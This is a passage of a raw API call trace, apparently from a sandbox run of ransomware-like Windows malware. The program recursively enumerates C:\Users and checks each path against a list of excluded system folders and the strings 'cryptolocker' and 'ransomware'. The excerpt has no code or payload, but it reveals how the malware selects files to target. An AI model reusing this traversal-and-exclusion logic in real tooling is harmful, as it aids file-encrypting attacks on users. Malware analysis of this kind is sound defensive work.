psz2="..") returned 1 [0072.040] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6ead2556, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6ead2556, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xacefef79, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0072.040] StrCmpW (psz1="swapfile.sys", psz2=".") returned 1 [0072.040] StrCmpW (psz1="swapfile.sys", psz2="..") returned 1 [0072.040] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x6e16f135, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0xb1ff7ba5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xb1ff7ba5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0072.040] StrCmpW (psz1="System Volume Information", psz2=".") returned 1 [0072.040] StrCmpW (psz1="System Volume Information", psz2="..") returned 1 [0072.040] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0072.040] StrCmpW (psz1="Users", psz2=".") returned 1 [0072.040] StrCmpW (psz1="Users", psz2="..") returned 1 [0072.040] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0072.040] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0072.040] StrNCatW (in: psz1="C:\\", psz2="Users", cchMax=1030 | out: psz1="C:\\Users") returned="C:\\Users" [0072.040] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\system32\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\system\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\Users", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\local\\") returned 0x0 [0072.040] StrStrIW (lpFirst="C:\\Users", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\boot\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\perflogs\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\programdata\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\drivers\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\wsus\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch="crypt_detect") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch="cryptolocker") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch="ransomware") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\WINDOWS") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.041] StrStrIW (lpFirst="C:\\Users", lpSrch="C:\\Program Files") returned 0x0 [0072.041] GetProcessHeap () returned 0xe30000 [0072.041] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x492) returned 0xecab68 [0072.041] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0072.041] StrNCatW (in: psz1="C:\\Users", psz2="\\*", cchMax=1042 | out: psz1="C:\\Users\\*") returned="C:\\Users\\*" [0072.041] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26f0 [0072.041] StrCmpW (psz1=".", psz2=".") returned 0 [0072.041] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.041] StrCmpW (psz1="..", psz2=".") returned 1 [0072.041] StrCmpW (psz1="..", psz2="..") returned 0 [0072.042] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd7b844b1, ftCreationTime.dwHighDateTime=0x1d2a02f, ftLastAccessTime.dwLowDateTime=0xd7b844b1, ftLastAccessTime.dwHighDateTime=0x1d2a02f, ftLastWriteTime.dwLowDateTime=0xd7b844b1, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0072.042] StrCmpW (psz1="All Users", psz2=".") returned 1 [0072.042] StrCmpW (psz1="All Users", psz2="..") returned 1 [0072.042] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0072.042] StrCmpW (psz1="Default", psz2=".") returned 1 [0072.042] StrCmpW (psz1="Default", psz2="..") returned 1 [0072.042] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Users", cchMax=1042 | out: psz1="C:\\Users") returned="C:\\Users" [0072.042] StrNCatW (in: psz1="C:\\Users", psz2="\\", cchMax=1042 | out: psz1="C:\\Users\\") returned="C:\\Users\\" [0072.042] StrNCatW (in: psz1="C:\\Users\\", psz2="Default", cchMax=1042 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\system32\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\system\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\local\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\boot\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\perflogs\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\programdata\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\drivers\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\wsus\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="crypt_detect") returned 0x0 [0072.042] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="cryptolocker") returned 0x0 [0072.043] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="ransomware") returned 0x0 [0072.043] StrStrIW (lpFirst="C:\\Users\\Default", lpSrch="C:\\WINDOWS") returned 0x0 [0072.043] GetProcessHeap () returned 0xe30000 [0072.043] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4a2) returned 0xec7e68 [0072.043] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.043] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\*", cchMax=1058 | out: psz1="C:\\Users\\Default\\*") returned="C:\\Users\\Default\\*" [0072.043] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec25f0 [0072.043] StrCmpW (psz1=".", psz2=".") returned 0 [0072.043] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.044] StrCmpW (psz1="..", psz2=".") returned 1 [0072.044] StrCmpW (psz1="..", psz2="..") returned 0 [0072.044] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0072.044] StrCmpW (psz1="AppData", psz2=".") returned 1 [0072.044] StrCmpW (psz1="AppData", psz2="..") returned 1 [0072.044] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0072.044] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0072.045] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="AppData", cchMax=1058 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0072.045] GetProcessHeap () returned 0xe30000 [0072.045] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xece048 [0072.045] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0072.045] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\*") returned="C:\\Users\\Default\\AppData\\*" [0072.045] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0072.045] StrCmpW (psz1=".", psz2=".") returned 0 [0072.045] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3aee4d3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.045] StrCmpW (psz1="..", psz2=".") returned 1 [0072.045] StrCmpW (psz1="..", psz2="..") returned 0 [0072.045] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0072.045] StrCmpW (psz1="Local", psz2=".") returned 1 [0072.046] StrCmpW (psz1="Local", psz2="..") returned 1 [0072.046] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0072.046] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0072.046] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\", psz2="Local", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0072.046] GetProcessHeap () returned 0xe30000 [0072.046] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0xecf510 [0072.046] StrCpyNW (in: psz1=0xecf510, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0072.046] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\*", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\*") returned="C:\\Users\\Default\\AppData\\Local\\*" [0072.046] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20f0 [0072.046] StrCmpW (psz1=".", psz2=".") returned 0 [0072.046] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.046] StrCmpW (psz1="..", psz2=".") returned 1 [0072.046] StrCmpW (psz1="..", psz2="..") returned 0 [0072.046] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0072.046] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0072.046] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0072.046] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0072.046] StrCmpW (psz1="History", psz2=".") returned 1 [0072.046] StrCmpW (psz1="History", psz2="..") returned 1 [0072.046] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3af063e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0072.046] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0072.046] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0072.046] StrCpyNW (in: psz1=0xecf510, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0072.046] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0072.046] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local\\", psz2="Microsoft", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft" [0072.046] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8b6f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0072.047] StrCmpW (psz1="Temp", psz2=".") returned 1 [0072.047] StrCmpW (psz1="Temp", psz2="..") returned 1 [0072.047] StrCpyNW (in: psz1=0xecf510, psz2="C:\\Users\\Default\\AppData\\Local", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0072.047] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local", psz2="\\", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0072.047] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Local\\", psz2="Temp", cchMax=1086 | out: psz1="C:\\Users\\Default\\AppData\\Local\\Temp") returned="C:\\Users\\Default\\AppData\\Local\\Temp" [0072.047] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0072.047] StrCmpW (psz1="Temporary Internet Files", psz2=".") returned 1 [0072.047] StrCmpW (psz1="Temporary Internet Files", psz2="..") returned 1 [0072.047] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0072.047] FindClose (in: hFindFile=0xec20f0 | out: hFindFile=0xec20f0) returned 1 [0072.047] GetProcessHeap () returned 0xe30000 [0072.047] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf510 | out: hHeap=0xe30000) returned 1 [0072.047] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0072.047] StrCmpW (psz1="Roaming", psz2=".") returned 1 [0072.047] StrCmpW (psz1="Roaming", psz2="..") returned 1 [0072.047] StrCpyNW (in: psz1=0xece048, psz2="C:\\Users\\Default\\AppData", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0072.047] StrNCatW (in: psz1="C:\\Users\\Default\\AppData", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0072.047] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\", psz2="Roaming", cchMax=1074 | out: psz1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0072.047] GetProcessHeap () returned 0xe30000 [0072.047] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c2) returned 0xecf510 [0072.047] StrCpyNW (in: psz1=0xecf510, psz2="C:\\Users\\Default\\AppData\\Roaming", cchMax=1090 | out: psz1="C:\\Users\\Default\\AppData\\Roaming") returned="C:\\Users\\Default\\AppData\\Roaming" [0072.047] StrNCatW (in: psz1="C:\\Users\\Default\\AppData\\Roaming", psz2="\\*", cchMax=1090 | out: psz1="C:\\Users\\Default\\AppData\\Roaming\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\*" [0072.047] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0072.048] StrCmpW (psz1=".", psz2=".") returned 0 [0072.048] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8c01f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.048] StrCmpW (psz1="..", psz2=".") returned 1 [0072.048] StrCmpW (psz1="..", psz2="..") returned 0 [0072.048] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xa2bc7808, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0072.048] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0072.048] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0072.048] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa2bc7808, 